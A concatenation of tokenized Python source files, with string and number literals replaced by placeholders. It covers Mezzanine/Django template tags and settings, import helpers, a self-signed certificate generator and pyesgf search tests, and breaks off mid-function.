<EOL> def fields_for ( context , form , template = "<STR_LIT>" ) : <EOL> """<STR_LIT>""" <EOL> context [ "<STR_LIT>" ] = form <EOL> return get_template ( template ) . render ( context ) <EOL> @ register . inclusion_tag ( "<STR_LIT>" , takes_context = True ) <EOL> def errors_for ( context , form ) : <EOL> """<STR_LIT>""" <EOL> return { "<STR_LIT>" : form } <EOL> @ register . 
filter <EOL> def sort_by ( items , attr ) : <EOL> """<STR_LIT>""" <EOL> def key_func ( item ) : <EOL> try : <EOL> return getattr ( item , attr ) <EOL> except AttributeError : <EOL> try : <EOL> return item [ attr ] <EOL> except TypeError : <EOL> getattr ( item , attr ) <EOL> return sorted ( items , key = key_func ) <EOL> @ register . filter <EOL> def is_installed ( app_name ) : <EOL> """<STR_LIT>""" <EOL> from warnings import warn <EOL> warn ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return app_name in settings . INSTALLED_APPS <EOL> @ register . tag <EOL> def ifinstalled ( parser , token ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> tag , app = token . split_contents ( ) <EOL> except ValueError : <EOL> raise TemplateSyntaxError ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> end_tag = "<STR_LIT:end>" + tag <EOL> unmatched_end_tag = <NUM_LIT:1> <EOL> if app . strip ( "<STR_LIT>" ) not in settings . INSTALLED_APPS : <EOL> while unmatched_end_tag : <EOL> token = parser . tokens . pop ( <NUM_LIT:0> ) <EOL> if token . token_type == TOKEN_BLOCK : <EOL> block_name = token . contents . split ( ) [ <NUM_LIT:0> ] <EOL> if block_name == tag : <EOL> unmatched_end_tag += <NUM_LIT:1> <EOL> if block_name == end_tag : <EOL> unmatched_end_tag -= <NUM_LIT:1> <EOL> parser . tokens . insert ( <NUM_LIT:0> , token ) <EOL> nodelist = parser . parse ( ( end_tag , ) ) <EOL> parser . delete_first_token ( ) <EOL> class IfInstalledNode ( Node ) : <EOL> def render ( self , context ) : <EOL> return nodelist . render ( context ) <EOL> return IfInstalledNode ( ) <EOL> @ register . render_tag <EOL> def set_short_url_for ( context , token ) : <EOL> """<STR_LIT>""" <EOL> obj = context [ token . split_contents ( ) [ <NUM_LIT:1> ] ] <EOL> obj . set_short_url ( ) <EOL> return "<STR_LIT>" <EOL> @ register . simple_tag <EOL> def gravatar_url ( email , size = <NUM_LIT:32> ) : <EOL> """<STR_LIT>""" <EOL> bits = ( md5 ( email . lower ( ) . encode ( "<STR_LIT:utf-8>" ) ) . 
hexdigest ( ) , size ) <EOL> return "<STR_LIT>" % bits <EOL> @ register . to_end_tag <EOL> def metablock ( parsed ) : <EOL> """<STR_LIT>""" <EOL> parsed = "<STR_LIT:U+0020>" . join ( parsed . replace ( "<STR_LIT:\n>" , "<STR_LIT>" ) . split ( ) ) . replace ( "<STR_LIT>" , "<STR_LIT:U+002C>" ) <EOL> return escape ( strip_tags ( decode_entities ( parsed ) ) ) <EOL> @ register . inclusion_tag ( "<STR_LIT>" , takes_context = True ) <EOL> def pagination_for ( context , current_page , page_var = "<STR_LIT>" , exclude_vars = "<STR_LIT>" ) : <EOL> """<STR_LIT>""" <EOL> querystring = context [ "<STR_LIT>" ] . GET . copy ( ) <EOL> exclude_vars = [ v for v in exclude_vars . split ( "<STR_LIT:U+002C>" ) if v ] + [ page_var ] <EOL> for exclude_var in exclude_vars : <EOL> if exclude_var in querystring : <EOL> del querystring [ exclude_var ] <EOL> querystring = querystring . urlencode ( ) <EOL> return { <EOL> "<STR_LIT>" : current_page , <EOL> "<STR_LIT>" : querystring , <EOL> "<STR_LIT>" : page_var , <EOL> } <EOL> @ register . inclusion_tag ( "<STR_LIT>" , takes_context = True ) <EOL> def search_form ( context , search_model_names = None ) : <EOL> """<STR_LIT>""" <EOL> template_vars = { <EOL> "<STR_LIT>" : context [ "<STR_LIT>" ] , <EOL> } <EOL> if not search_model_names or not settings . SEARCH_MODEL_CHOICES : <EOL> search_model_names = [ ] <EOL> elif search_model_names == "<STR_LIT:all>" : <EOL> search_model_names = list ( settings . SEARCH_MODEL_CHOICES ) <EOL> else : <EOL> search_model_names = search_model_names . split ( "<STR_LIT:U+0020>" ) <EOL> search_model_choices = [ ] <EOL> for model_name in search_model_names : <EOL> try : <EOL> model = apps . get_model ( * model_name . split ( "<STR_LIT:.>" , <NUM_LIT:1> ) ) <EOL> except LookupError : <EOL> pass <EOL> else : <EOL> verbose_name = model . _meta . verbose_name_plural . capitalize ( ) <EOL> search_model_choices . 
append ( ( verbose_name , model_name ) ) <EOL> template_vars [ "<STR_LIT>" ] = sorted ( search_model_choices ) <EOL> return template_vars <EOL> @ register . simple_tag <EOL> def thumbnail ( image_url , width , height , upscale = True , quality = <NUM_LIT> , left = <NUM_LIT> , <EOL> top = <NUM_LIT> , padding = False , padding_color = "<STR_LIT>" ) : <EOL> """<STR_LIT>""" <EOL> if not image_url : <EOL> return "<STR_LIT>" <EOL> try : <EOL> from PIL import Image , ImageFile , ImageOps <EOL> except ImportError : <EOL> return "<STR_LIT>" <EOL> image_url = unquote ( str ( image_url ) ) . split ( "<STR_LIT:?>" ) [ <NUM_LIT:0> ] <EOL> if image_url . startswith ( settings . MEDIA_URL ) : <EOL> image_url = image_url . replace ( settings . MEDIA_URL , "<STR_LIT>" , <NUM_LIT:1> ) <EOL> image_dir , image_name = os . path . split ( image_url ) <EOL> image_prefix , image_ext = os . path . splitext ( image_name ) <EOL> filetype = { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT>" } . get ( image_ext , "<STR_LIT>" ) <EOL> thumb_name = "<STR_LIT>" % ( image_prefix , width , height ) <EOL> if not upscale : <EOL> thumb_name += "<STR_LIT>" <EOL> if left != <NUM_LIT> or top != <NUM_LIT> : <EOL> left = min ( <NUM_LIT:1> , max ( <NUM_LIT:0> , left ) ) <EOL> top = min ( <NUM_LIT:1> , max ( <NUM_LIT:0> , top ) ) <EOL> thumb_name = "<STR_LIT>" % ( thumb_name , left , top ) <EOL> thumb_name += "<STR_LIT>" % padding_color if padding else "<STR_LIT>" <EOL> thumb_name = "<STR_LIT>" % ( thumb_name , image_ext ) <EOL> thumb_dir = os . path . join ( settings . MEDIA_ROOT , image_dir , <EOL> settings . THUMBNAILS_DIR_NAME , image_name ) <EOL> if not os . path . exists ( thumb_dir ) : <EOL> try : <EOL> os . makedirs ( thumb_dir ) <EOL> except OSError : <EOL> pass <EOL> thumb_path = os . path . join ( thumb_dir , thumb_name ) <EOL> thumb_url = "<STR_LIT>" % ( settings . THUMBNAILS_DIR_NAME , <EOL> quote ( image_name . encode ( "<STR_LIT:utf-8>" ) ) , <EOL> quote ( thumb_name . 
encode ( "<STR_LIT:utf-8>" ) ) ) <EOL> image_url_path = os . path . dirname ( image_url ) <EOL> if image_url_path : <EOL> thumb_url = "<STR_LIT>" % ( image_url_path , thumb_url ) <EOL> try : <EOL> thumb_exists = os . path . exists ( thumb_path ) <EOL> except UnicodeEncodeError : <EOL> from mezzanine . core . exceptions import FileSystemEncodingChanged <EOL> raise FileSystemEncodingChanged ( ) <EOL> if thumb_exists : <EOL> return thumb_url <EOL> elif not default_storage . exists ( image_url ) : <EOL> return image_url <EOL> f = default_storage . open ( image_url ) <EOL> try : <EOL> image = Image . open ( f ) <EOL> except : <EOL> return image_url <EOL> image_info = image . info <EOL> to_width = int ( width ) <EOL> to_height = int ( height ) <EOL> from_width = image . size [ <NUM_LIT:0> ] <EOL> from_height = image . size [ <NUM_LIT:1> ] <EOL> if not upscale : <EOL> to_width = min ( to_width , from_width ) <EOL> to_height = min ( to_height , from_height ) <EOL> if to_width == <NUM_LIT:0> : <EOL> to_width = from_width * to_height // from_height <EOL> elif to_height == <NUM_LIT:0> : <EOL> to_height = from_height * to_width // from_width <EOL> if image . mode not in ( "<STR_LIT:P>" , "<STR_LIT:L>" , "<STR_LIT>" ) : <EOL> try : <EOL> image = image . convert ( "<STR_LIT>" ) <EOL> except : <EOL> return image_url <EOL> ImageFile . MAXBLOCK = <NUM_LIT:2> * ( max ( image . 
size ) ** <NUM_LIT:2> ) <EOL> if padding and to_width and to_height : <EOL> from_ratio = float ( from_width ) / from_height <EOL> to_ratio = float ( to_width ) / to_height <EOL> pad_size = None <EOL> if to_ratio < from_ratio : <EOL> pad_height = int ( to_height * ( float ( from_width ) / to_width ) ) <EOL> pad_size = ( from_width , pad_height ) <EOL> pad_top = ( pad_height - from_height ) // <NUM_LIT:2> <EOL> pad_left = <NUM_LIT:0> <EOL> elif to_ratio > from_ratio : <EOL> pad_width = int ( to_width * ( float ( from_height ) / to_height ) ) <EOL> pad_size = ( pad_width , from_height ) <EOL> pad_top = <NUM_LIT:0> <EOL> pad_left = ( pad_width - from_width ) // <NUM_LIT:2> <EOL> if pad_size is not None : <EOL> pad_container = Image . new ( "<STR_LIT>" , pad_size , padding_color ) <EOL> pad_container . paste ( image , ( pad_left , pad_top ) ) <EOL> image = pad_container <EOL> to_size = ( to_width , to_height ) <EOL> to_pos = ( left , top ) <EOL> try : <EOL> image = ImageOps . fit ( image , to_size , Image . ANTIALIAS , <NUM_LIT:0> , to_pos ) <EOL> image = image . save ( thumb_path , filetype , quality = quality , ** image_info ) <EOL> if "<STR_LIT>" in settings . MEDIA_URL : <EOL> with open ( thumb_path , "<STR_LIT:rb>" ) as f : <EOL> default_storage . save ( thumb_url , File ( f ) ) <EOL> except Exception : <EOL> try : <EOL> os . remove ( thumb_path ) <EOL> except Exception : <EOL> pass <EOL> return image_url <EOL> return thumb_url <EOL> @ register . inclusion_tag ( "<STR_LIT>" , takes_context = True ) <EOL> def editable_loader ( context ) : <EOL> """<STR_LIT>""" <EOL> user = context [ "<STR_LIT>" ] . user <EOL> template_vars = { <EOL> "<STR_LIT>" : has_site_permission ( user ) , <EOL> "<STR_LIT>" : context [ "<STR_LIT>" ] , <EOL> } <EOL> if ( settings . INLINE_EDITING_ENABLED and <EOL> template_vars [ "<STR_LIT>" ] ) : <EOL> t = get_template ( "<STR_LIT>" ) <EOL> template_vars [ "<STR_LIT>" ] = REDIRECT_FIELD_NAME <EOL> template_vars [ "<STR_LIT>" ] = context . 
get ( "<STR_LIT>" , <EOL> context . get ( "<STR_LIT>" , None ) ) <EOL> template_vars [ "<STR_LIT>" ] = context . get ( <EOL> "<STR_LIT>" , None ) <EOL> template_vars [ "<STR_LIT>" ] = t . render ( Context ( template_vars ) ) <EOL> template_vars [ "<STR_LIT>" ] = RichTextField ( ) . formfield ( <EOL> ) . widget . media <EOL> return template_vars <EOL> @ register . filter <EOL> def richtext_filters ( content ) : <EOL> """<STR_LIT>""" <EOL> filter_names = settings . RICHTEXT_FILTERS <EOL> if not filter_names : <EOL> try : <EOL> filter_names = [ settings . RICHTEXT_FILTER ] <EOL> except AttributeError : <EOL> pass <EOL> else : <EOL> from warnings import warn <EOL> warn ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> for filter_name in filter_names : <EOL> filter_func = import_dotted_path ( filter_name ) <EOL> content = filter_func ( content ) <EOL> return content <EOL> @ register . filter <EOL> def richtext_filter ( content ) : <EOL> """<STR_LIT>""" <EOL> from warnings import warn <EOL> warn ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return richtext_filters ( content ) <EOL> @ register . to_end_tag <EOL> def editable ( parsed , context , token ) : <EOL> """<STR_LIT>""" <EOL> def parse_field ( field ) : <EOL> field = field . split ( "<STR_LIT:.>" ) <EOL> obj = context . get ( field . pop ( <NUM_LIT:0> ) , None ) <EOL> attr = field . pop ( ) <EOL> while field : <EOL> obj = getattr ( obj , field . pop ( <NUM_LIT:0> ) ) <EOL> if callable ( obj ) : <EOL> obj = obj ( ) <EOL> return obj , attr <EOL> fields = [ parse_field ( f ) for f in token . split_contents ( ) [ <NUM_LIT:1> : ] ] <EOL> if fields : <EOL> fields = [ f for f in fields if len ( f ) == <NUM_LIT:2> and f [ <NUM_LIT:0> ] is fields [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] ] <EOL> if not parsed . strip ( ) : <EOL> try : <EOL> parsed = "<STR_LIT>" . join ( [ str ( getattr ( * field ) ) for field in fields ] ) <EOL> except AttributeError : <EOL> pass <EOL> if settings . 
INLINE_EDITING_ENABLED and fields and "<STR_LIT>" in context : <EOL> obj = fields [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> if isinstance ( obj , Model ) and is_editable ( obj , context [ "<STR_LIT>" ] ) : <EOL> field_names = "<STR_LIT:U+002C>" . join ( [ f [ <NUM_LIT:1> ] for f in fields ] ) <EOL> context [ "<STR_LIT>" ] = get_edit_form ( obj , field_names ) <EOL> context [ "<STR_LIT>" ] = parsed <EOL> t = get_template ( "<STR_LIT>" ) <EOL> return t . render ( context ) <EOL> return parsed <EOL> @ register . simple_tag <EOL> def try_url ( url_name ) : <EOL> """<STR_LIT>""" <EOL> from warnings import warn <EOL> warn ( "<STR_LIT>" ) <EOL> try : <EOL> url = reverse ( url_name ) <EOL> except NoReverseMatch : <EOL> return "<STR_LIT>" <EOL> return url <EOL> def admin_app_list ( request ) : <EOL> """<STR_LIT>""" <EOL> app_dict = { } <EOL> menu_order = { } <EOL> for ( group_index , group ) in enumerate ( settings . ADMIN_MENU_ORDER ) : <EOL> group_title , items = group <EOL> for ( item_index , item ) in enumerate ( items ) : <EOL> if isinstance ( item , ( tuple , list ) ) : <EOL> item_title , item = item <EOL> else : <EOL> item_title = None <EOL> menu_order [ item ] = ( group_index , group_title , <EOL> item_index , item_title ) <EOL> for ( model , model_admin ) in admin . site . _registry . items ( ) : <EOL> opts = model . _meta <EOL> in_menu = not hasattr ( model_admin , "<STR_LIT>" ) or model_admin . in_menu ( ) <EOL> if in_menu and request . user . has_module_perms ( opts . app_label ) : <EOL> perms = model_admin . get_model_perms ( request ) <EOL> admin_url_name = "<STR_LIT>" <EOL> if perms [ "<STR_LIT>" ] : <EOL> admin_url_name = "<STR_LIT>" <EOL> change_url = admin_url ( model , admin_url_name ) <EOL> else : <EOL> change_url = None <EOL> if perms [ "<STR_LIT>" ] : <EOL> admin_url_name = "<STR_LIT>" <EOL> add_url = admin_url ( model , admin_url_name ) <EOL> else : <EOL> add_url = None <EOL> if admin_url_name : <EOL> model_label = "<STR_LIT>" % ( opts . 
app_label , opts . object_name ) <EOL> try : <EOL> app_index , app_title , model_index , model_title = menu_order [ model_label ] <EOL> except KeyError : <EOL> app_index = None <EOL> app_title = opts . app_config . verbose_name . title ( ) <EOL> model_index = None <EOL> model_title = None <EOL> else : <EOL> del menu_order [ model_label ] <EOL> if not model_title : <EOL> model_title = capfirst ( model . _meta . verbose_name_plural ) <EOL> if app_title not in app_dict : <EOL> app_dict [ app_title ] = { <EOL> "<STR_LIT:index>" : app_index , <EOL> "<STR_LIT:name>" : app_title , <EOL> "<STR_LIT>" : [ ] , <EOL> } <EOL> app_dict [ app_title ] [ "<STR_LIT>" ] . append ( { <EOL> "<STR_LIT:index>" : model_index , <EOL> "<STR_LIT>" : model_admin . get_model_perms ( request ) , <EOL> "<STR_LIT:name>" : model_title , <EOL> "<STR_LIT:object_name>" : opts . object_name , <EOL> "<STR_LIT>" : change_url , <EOL> "<STR_LIT>" : add_url <EOL> } ) <EOL> for ( item_url , item ) in menu_order . items ( ) : <EOL> app_index , app_title , item_index , item_title = item <EOL> try : <EOL> item_url = reverse ( item_url ) <EOL> except NoReverseMatch : <EOL> continue <EOL> if app_title not in app_dict : <EOL> app_dict [ app_title ] = { <EOL> "<STR_LIT:index>" : app_index , <EOL> "<STR_LIT:name>" : app_title , <EOL> "<STR_LIT>" : [ ] , <EOL> } <EOL> app_dict [ app_title ] [ "<STR_LIT>" ] . append ( { <EOL> "<STR_LIT:index>" : item_index , <EOL> "<STR_LIT>" : { "<STR_LIT>" : True } , <EOL> "<STR_LIT:name>" : item_title , <EOL> "<STR_LIT>" : item_url , <EOL> } ) <EOL> app_list = list ( app_dict . values ( ) ) <EOL> sort = lambda x : ( x [ "<STR_LIT:index>" ] if x [ "<STR_LIT:index>" ] is not None else <NUM_LIT> , x [ "<STR_LIT:name>" ] ) <EOL> for app in app_list : <EOL> app [ "<STR_LIT>" ] . sort ( key = sort ) <EOL> app_list . sort ( key = sort ) <EOL> return app_list <EOL> @ register . 
inclusion_tag ( "<STR_LIT>" , <EOL> takes_context = True ) <EOL> def admin_dropdown_menu ( context ) : <EOL> """<STR_LIT>""" <EOL> user = context [ "<STR_LIT>" ] . user <EOL> template_vars = { } <EOL> if user . is_staff : <EOL> template_vars [ "<STR_LIT>" ] = admin_app_list ( <EOL> context [ "<STR_LIT>" ] ) <EOL> if user . is_superuser : <EOL> sites = Site . objects . all ( ) <EOL> else : <EOL> try : <EOL> sites = user . sitepermissions . sites . all ( ) <EOL> except ObjectDoesNotExist : <EOL> sites = Site . objects . none ( ) <EOL> template_vars [ "<STR_LIT>" ] = list ( sites ) <EOL> template_vars [ "<STR_LIT>" ] = current_site_id ( ) <EOL> template_vars [ "<STR_LIT>" ] = context [ "<STR_LIT>" ] <EOL> template_vars [ "<STR_LIT>" ] = context [ "<STR_LIT>" ] <EOL> return template_vars <EOL> @ register . inclusion_tag ( "<STR_LIT>" , takes_context = True ) <EOL> def app_list ( context ) : <EOL> """<STR_LIT>""" <EOL> context [ "<STR_LIT>" ] = admin_app_list ( context [ "<STR_LIT>" ] ) <EOL> return context <EOL> @ register . inclusion_tag ( "<STR_LIT>" , <EOL> takes_context = True ) <EOL> def recent_actions ( context ) : <EOL> """<STR_LIT>""" <EOL> return context <EOL> @ register . render_tag <EOL> def dashboard_column ( context , token ) : <EOL> """<STR_LIT>""" <EOL> column_index = int ( token . split_contents ( ) [ <NUM_LIT:1> ] ) <EOL> output = [ ] <EOL> for tag in settings . DASHBOARD_TAGS [ column_index ] : <EOL> t = Template ( "<STR_LIT>" % tuple ( tag . split ( "<STR_LIT:.>" ) ) ) <EOL> output . append ( t . render ( context ) ) <EOL> return "<STR_LIT>" . join ( output ) <EOL> @ register . simple_tag ( takes_context = True ) <EOL> def translate_url ( context , language ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> request = context [ "<STR_LIT>" ] <EOL> except KeyError : <EOL> return "<STR_LIT>" <EOL> view = resolve ( request . path ) <EOL> current_language = translation . get_language ( ) <EOL> translation . 
activate ( language ) <EOL> try : <EOL> url = reverse ( view . func , args = view . args , kwargs = view . kwargs ) <EOL> except NoReverseMatch : <EOL> try : <EOL> url_name = ( view . url_name if not view . namespace <EOL> else '<STR_LIT>' % ( view . namespace , view . url_name ) ) <EOL> url = reverse ( url_name , args = view . args , kwargs = view . kwargs ) <EOL> except NoReverseMatch : <EOL> url_name = "<STR_LIT>" + view . url_name <EOL> url = reverse ( url_name , args = view . args , kwargs = view . kwargs ) <EOL> translation . activate ( current_language ) <EOL> if context [ '<STR_LIT>' ] . META [ "<STR_LIT>" ] : <EOL> url += "<STR_LIT:?>" + context [ '<STR_LIT>' ] . META [ "<STR_LIT>" ] <EOL> return url </s>
<s> """<STR_LIT>""" <EOL> from __future__ import unicode_literals <EOL> from future . builtins import range <EOL> from django . conf import settings <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from mezzanine . conf import register_setting <EOL> generic_comments = getattr ( settings , "<STR_LIT>" , "<STR_LIT>" ) == "<STR_LIT>" <EOL> if generic_comments : <EOL> register_setting ( <EOL> name = "<STR_LIT>" , <EOL> label = _ ( "<STR_LIT>" ) , <EOL> description = _ ( "<STR_LIT>" ) , <EOL> editable = True , <EOL> default = False , <EOL> ) <EOL> register_setting ( <EOL> name = "<STR_LIT>" , <EOL> label = _ ( "<STR_LIT>" ) , <EOL> description = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> editable = True , <EOL> default = "<STR_LIT>" , <EOL> ) <EOL> register_setting ( <EOL> name = "<STR_LIT>" , <EOL> label = _ ( "<STR_LIT>" ) , <EOL> description = _ ( "<STR_LIT>" ) , <EOL> editable = True , <EOL> default = "<STR_LIT>" , <EOL> ) <EOL> register_setting ( <EOL> name = "<STR_LIT>" , <EOL> label = _ ( "<STR_LIT>" ) , <EOL> description = _ ( "<STR_LIT>" ) , <EOL> editable = True , <EOL> default = "<STR_LIT>" , <EOL> ) <EOL> register_setting ( <EOL> name = "<STR_LIT>" , <EOL> label = _ ( "<STR_LIT>" ) , <EOL> description = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> editable = True , <EOL> default = True , <EOL> ) <EOL> register_setting ( <EOL> name = "<STR_LIT>" , <EOL> description = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> editable = False , <EOL> default = None , <EOL> ) <EOL> register_setting ( <EOL> name = "<STR_LIT>" , <EOL> label = _ ( "<STR_LIT>" ) , <EOL> description = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> editable = True , <EOL> default = "<STR_LIT>" , <EOL> ) <EOL> register_setting ( <EOL> name = "<STR_LIT>" , <EOL> label = _ ( "<STR_LIT>" ) , <EOL> description = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> editable = True , <EOL> default = <NUM_LIT:5> , <EOL> ) <EOL> register_setting ( <EOL> name = "<STR_LIT>" , 
<EOL> label = _ ( "<STR_LIT>" ) , <EOL> description = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> editable = True , <EOL> default = True , <EOL> ) <EOL> register_setting ( <EOL> name = "<STR_LIT>" , <EOL> label = _ ( "<STR_LIT>" ) , <EOL> description = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> editable = True , <EOL> default = True , <EOL> ) <EOL> register_setting ( <EOL> name = "<STR_LIT>" , <EOL> description = _ ( "<STR_LIT>" ) , <EOL> editable = False , <EOL> default = True , <EOL> ) <EOL> register_setting ( <EOL> name = "<STR_LIT>" , <EOL> description = _ ( "<STR_LIT>" ) , <EOL> editable = False , <EOL> default = "<STR_LIT>" , <EOL> ) <EOL> register_setting ( <EOL> name = "<STR_LIT>" , <EOL> label = _ ( "<STR_LIT>" ) , <EOL> description = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> editable = True , <EOL> default = False , <EOL> ) <EOL> register_setting ( <EOL> name = "<STR_LIT>" , <EOL> description = _ ( "<STR_LIT>" ) , <EOL> editable = False , <EOL> default = list ( range ( getattr ( settings , "<STR_LIT>" , <NUM_LIT:1> ) , <EOL> getattr ( settings , "<STR_LIT>" , <NUM_LIT:5> ) + <NUM_LIT:1> ) ) , <EOL> ) </s>
<s> from __future__ import unicode_literals <EOL> from future . builtins import str as _str <EOL> from collections import defaultdict <EOL> from importlib import import_module <EOL> from django . apps import apps <EOL> from django . utils . module_loading import module_has_submodule <EOL> from mezzanine . pages . models import Page <EOL> from mezzanine . utils . importing import get_app_name_list <EOL> processors = defaultdict ( list ) <EOL> def processor_for ( content_model_or_slug , exact_page = False ) : <EOL> """<STR_LIT>""" <EOL> content_model = None <EOL> slug = "<STR_LIT>" <EOL> if isinstance ( content_model_or_slug , ( str , _str ) ) : <EOL> try : <EOL> parts = content_model_or_slug . split ( "<STR_LIT:.>" , <NUM_LIT:1> ) <EOL> content_model = apps . get_model ( * parts ) <EOL> except ( TypeError , ValueError , LookupError ) : <EOL> slug = content_model_or_slug <EOL> elif issubclass ( content_model_or_slug , Page ) : <EOL> content_model = content_model_or_slug <EOL> else : <EOL> raise TypeError ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % <EOL> content_model_or_slug ) <EOL> def decorator ( func ) : <EOL> parts = ( func , exact_page ) <EOL> if content_model : <EOL> model_name = content_model . _meta . object_name . lower ( ) <EOL> processors [ model_name ] . insert ( <NUM_LIT:0> , parts ) <EOL> else : <EOL> processors [ "<STR_LIT>" % slug ] . insert ( <NUM_LIT:0> , parts ) <EOL> return func <EOL> return decorator <EOL> LOADED = False <EOL> def autodiscover ( ) : <EOL> """<STR_LIT>""" <EOL> global LOADED <EOL> if LOADED : <EOL> return <EOL> LOADED = True <EOL> for app in get_app_name_list ( ) : <EOL> try : <EOL> module = import_module ( app ) <EOL> except ImportError : <EOL> pass <EOL> else : <EOL> try : <EOL> import_module ( "<STR_LIT>" % app ) <EOL> except : <EOL> if module_has_submodule ( module , "<STR_LIT>" ) : <EOL> raise </s>
<s> from __future__ import unicode_literals <EOL> import os <EOL> from importlib import import_module <EOL> from django . apps import apps <EOL> def path_for_import ( name ) : <EOL> """<STR_LIT>""" <EOL> return os . path . dirname ( os . path . abspath ( import_module ( name ) . __file__ ) ) <EOL> def import_dotted_path ( path ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> module_path , member_name = path . rsplit ( "<STR_LIT:.>" , <NUM_LIT:1> ) <EOL> module = import_module ( module_path ) <EOL> return getattr ( module , member_name ) <EOL> except ( ValueError , ImportError , AttributeError ) as e : <EOL> raise ImportError ( "<STR_LIT>" % ( path , e ) ) <EOL> def get_app_name_list ( ) : <EOL> for app in apps . get_app_configs ( ) : <EOL> yield app . name </s>
<s> import OpenSSL <EOL> def generate_cert_and_pkey ( as_string = True , passphrase = None ) : <EOL> key = OpenSSL . crypto . PKey ( ) <EOL> key . generate_key ( OpenSSL . crypto . TYPE_RSA , <NUM_LIT> ) <EOL> cert = OpenSSL . crypto . X509 ( ) <EOL> cert . set_version ( <NUM_LIT:3> ) <EOL> cert . set_serial_number ( <NUM_LIT:1> ) <EOL> cert . get_subject ( ) . CN = '<STR_LIT:127.0.0.1>' <EOL> cert . gmtime_adj_notBefore ( <NUM_LIT:0> ) <EOL> cert . gmtime_adj_notAfter ( <NUM_LIT> * <NUM_LIT> * <NUM_LIT> ) <EOL> cert . set_issuer ( cert . get_subject ( ) ) <EOL> cert . set_pubkey ( key ) <EOL> cert . sign ( key , '<STR_LIT>' ) <EOL> if as_string : <EOL> args = [ OpenSSL . crypto . FILETYPE_PEM , key ] <EOL> if passphrase is not None : <EOL> args += [ '<STR_LIT>' , passphrase ] <EOL> cert = OpenSSL . crypto . dump_certificate ( OpenSSL . crypto . FILETYPE_PEM , cert ) <EOL> key = OpenSSL . crypto . dump_privatekey ( * args ) <EOL> return cert , key </s>
<s> """<STR_LIT>""" <EOL> from pyesgf . search import SearchConnection , not_equals <EOL> from . config import TEST_SERVICE <EOL> def test_context_freetext ( ) : <EOL> conn = SearchConnection ( TEST_SERVICE ) <EOL> context = conn . new_context ( query = "<STR_LIT>" ) <EOL> assert context . freetext_constraint == "<STR_LIT>" <EOL> def test_context_facets1 ( ) : <EOL> conn = SearchConnection ( TEST_SERVICE ) <EOL> context = conn . new_context ( project = '<STR_LIT>' ) <EOL> assert context . facet_constraints [ '<STR_LIT>' ] == '<STR_LIT>' <EOL> def test_context_facets1 ( ) : <EOL> conn = SearchConnection ( TEST_SERVICE ) <EOL> context = conn . new_context ( project = '<STR_LIT>' ) <EOL> context2 = context . constrain ( model = "<STR_LIT>" ) <EOL> assert context2 . facet_constraints [ '<STR_LIT>' ] == '<STR_LIT>' <EOL> assert context2 . facet_constraints [ '<STR_LIT>' ] == '<STR_LIT>' <EOL> def test_context_facets_multivalue ( ) : <EOL> conn = SearchConnection ( TEST_SERVICE ) <EOL> context = conn . new_context ( project = '<STR_LIT>' ) <EOL> context2 = context . constrain ( model = [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> assert context2 . hit_count > <NUM_LIT:0> <EOL> assert context2 . facet_constraints [ '<STR_LIT>' ] == '<STR_LIT>' <EOL> assert sorted ( context2 . facet_constraints . getall ( '<STR_LIT>' ) ) == [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> def test_context_facet_multivalue2 ( ) : <EOL> conn = SearchConnection ( TEST_SERVICE ) <EOL> context = conn . new_context ( project = '<STR_LIT>' , model = '<STR_LIT>' ) <EOL> assert context . facet_constraints . getall ( '<STR_LIT>' ) == [ '<STR_LIT>' ] <EOL> context2 = context . constrain ( model = [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> assert sorted ( context2 . facet_constraints . getall ( '<STR_LIT>' ) ) == [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> def test_context_facet_multivalue3 ( ) : <EOL> conn = SearchConnection ( TEST_SERVICE ) <EOL> ctx = conn . 
new_context ( project = '<STR_LIT>' , query = '<STR_LIT>' , experiment = '<STR_LIT>' ) <EOL> hits1 = ctx . hit_count <EOL> assert hits1 > <NUM_LIT:0> <EOL> ctx2 = conn . new_context ( project = '<STR_LIT>' , query = '<STR_LIT>' , <EOL> experiment = [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> hits2 = ctx2 . hit_count <EOL> assert hits2 > hits1 <EOL> def test_context_facet_options ( ) : <EOL> conn = SearchConnection ( TEST_SERVICE ) <EOL> context = conn . new_context ( project = '<STR_LIT>' , model = '<STR_LIT>' , <EOL> ensemble = '<STR_LIT>' , experiment = '<STR_LIT>' , <EOL> realm = '<STR_LIT>' <EOL> ) <EOL> assert context . get_facet_options ( ) . keys ( ) == [ <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' <EOL> ] <EOL> def test_context_facets3 ( ) : <EOL> conn = SearchConnection ( TEST_SERVICE ) <EOL> context = conn . new_context ( project = '<STR_LIT>' ) <EOL> context2 = context . constrain ( model = "<STR_LIT>" ) <EOL> results = context2 . search ( ) <EOL> result = results [ <NUM_LIT:0> ] <EOL> assert result . json [ '<STR_LIT>' ] == [ '<STR_LIT>' ] <EOL> assert result . json [ '<STR_LIT>' ] == [ '<STR_LIT>' ] <EOL> def test_facet_count ( ) : <EOL> conn = 